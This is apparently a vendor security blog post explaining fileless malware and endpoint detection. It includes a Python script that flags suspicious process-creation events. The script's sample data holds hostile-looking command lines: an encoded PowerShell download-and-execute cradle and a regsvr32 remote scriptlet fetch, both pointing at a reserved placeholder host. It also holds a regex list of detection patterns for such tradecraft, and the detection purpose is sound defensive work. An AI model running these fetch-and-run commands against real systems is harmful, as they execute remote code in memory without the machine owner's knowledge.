WatchGuard Blog

Fileless attacks: a cybersecurity insight to be taken into account

Well-resourced attackers are capable of compromising a system in an organization without being detected. And malwareless attacks, where cybercriminals get into critical business networks without ever dropping a malware binary on disk, are on the rise.

Instead of installing a malicious application on the victim's hard drive like traditional malware, fileless malware loads malicious code directly into memory. It tends to use two entry vectors: either it exploits an existing vulnerability in a program the victim uses (a browser, a document viewer, an exposed network service), or it arrives as content that is never installed as an executable, such as a script run by an interpreter that is already present on the system. Fileless malware often injects its code into the memory of existing, trusted processes, which makes it very difficult for conventional antivirus solutions to detect: there is no file on disk to scan, and the process hosting the code is a legitimate one.

Although these techniques are not that new (the first memory-resident viruses emerged in the 80s, and in the early 2000s memory-only worms such as Code Red and SQL Slammer spread across networks by exploiting services without ever writing themselves to disk), there has been exponential growth in cases since 2016. At WatchGuard, we have registered more than 200,000 different examples of malware originating from scripts since 2020 (compared to fewer than 50,000 from browsers, which come second in the entry point ranking). This is an increase of 888% compared to 2019.

Traditional security products base their analysis primarily on signatures of known, file-based malware. Today they can also flag some anomalous patterns in script content (obfuscation, encoded payloads, download-and-execute constructs) that may indicate a script-based attack, with varying degrees of sophistication, but a signature has nothing to match when the payload never touches disk.

With this in mind, should fileless malware attacks still be considered a problem, or indeed the main focus, for modern businesses, especially when there are solutions available to prevent them?

Fortunately, tools like intrusion prevention services are capable of detecting and blocking network exploits, and halting "vaporworm" infections (fileless worms that spread by exploiting network services). Additionally, Endpoint Detection and Response (EDR) solutions that monitor process behavior (which process launched which, what command line it ran, what it loaded into memory) can catch fileless activity before damage is done, even when there is no file to scan. Now WatchGuard goes one step further with WatchGuard EPDR, bringing together our Endpoint Protection (EPP) and Endpoint Detection and Response (EDR) capabilities into one product for maximum security against sophisticated endpoint threats.
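To make the "script as entry vector" and "monitor process behavior" points concrete, here is an added example of the kind of check an EDR applies to process-creation telemetry. It is illustration code written for this post, not WatchGuard's product logic. It assumes process-creation records with the fields found in Sysmon Event ID 1 or Windows Security Event 4688 (parent image, image, command line); the field names, the rule set, and the sample events (including the base64-encoded PowerShell download cradle, which is built inline) are constructed for the example.

```python
"""Score process-creation events for fileless / script-based tradecraft.

Added example, not WatchGuard code. Input records are constructed to look
like Sysmon Event ID 1 / Windows Event 4688 fields; the field names,
indicator rules and sample values are assumptions for illustration.
"""
import base64
import re

# Script hosts and "living off the land" binaries that commonly run
# fileless payloads; the rules below are only applied to these images.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Each rule is (indicator name, regex run over the raw command line and,
# when present, over the decoded -EncodedCommand payload).
RULES = [
    ("encoded_command", re.compile(
        r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}")),
    ("download_cradle", re.compile(
        r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b")),
    ("in_memory_exec", re.compile(
        r"(?i)\biex\b|invoke-expression|\[reflection\.assembly\]::load|virtualalloc")),
    ("hidden_noprofile", re.compile(
        r"(?i)-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b|-noprofile|-noninteractive")),
    ("bypass_policy", re.compile(r"(?i)-ep\s+bypass|-executionpolicy\s+bypass")),
    ("lolbin_remote", re.compile(
        r"(?i)regsvr32.*/i:https?:|mshta\s+https?:|rundll32.*javascript:")),
]

ENCODED_ARG = re.compile(r"(?i)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return the sorted list of indicator names that fire for one event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]
    if image not in INTERPRETERS:
        return []  # only script hosts / LOLBins are in scope for these rules
    decoded = decode_encoded_command(cmd)
    texts = [cmd] + ([decoded] if decoded else [])
    hits = {name for name, rx in RULES if any(rx.search(t) for t in texts)}
    if parent in OFFICE_PARENTS:
        hits.add("office_spawned_interpreter")  # classic macro -> script chain
    return sorted(hits)


def analyze(events):
    """Map event id -> fired indicators, keeping only events with at least one hit."""
    return {e["id"]: hits for e in events if (hits := score_event(e))}


# Constructed sample telemetry. The encoded payload is generated here so the
# example stays self-contained; the URL host is a reserved .invalid name.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {   # constructed: macro document launching a hidden, encoded PowerShell download cradle
        "id": 1,
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}",
    },
    {   # constructed: benign scheduled maintenance script
        "id": 2,
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -File C:\Scripts\CleanupTempFiles.ps1",
    },
    {   # constructed: regsvr32 fetching and running a remote scriptlet, nothing written to disk
        "id": 3,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\regsvr32.exe",
        "command_line": "regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll",
    },
    {   # constructed: ordinary application start, out of scope for the rules
        "id": 4,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "command_line": '"C:\\Program Files\\Mozilla Firefox\\firefox.exe"',
    },
]

if __name__ == "__main__":
    for event_id, hits in analyze(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(hits)}")
```

Two design points matter in practice. First, the encoded command is decoded before the rules run; a file scanner never sees that payload, and an EDR that only matches the raw command line would miss the `DownloadString` and `IEX` inside it. Second, these are indicators, not verdicts: `-NoProfile` and encoded commands are also used by legitimate management tooling, so a real detection weights and combines hits (an Office parent plus a hidden encoded download cradle is far stronger than any one of them alone) rather than alerting on a single match.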

As always, understanding the threat is half the battle. By educating yourself and your organization about the potential for and mechanics of malware attacks, you can ensure you have the necessary protections in place to avoid becoming a victim.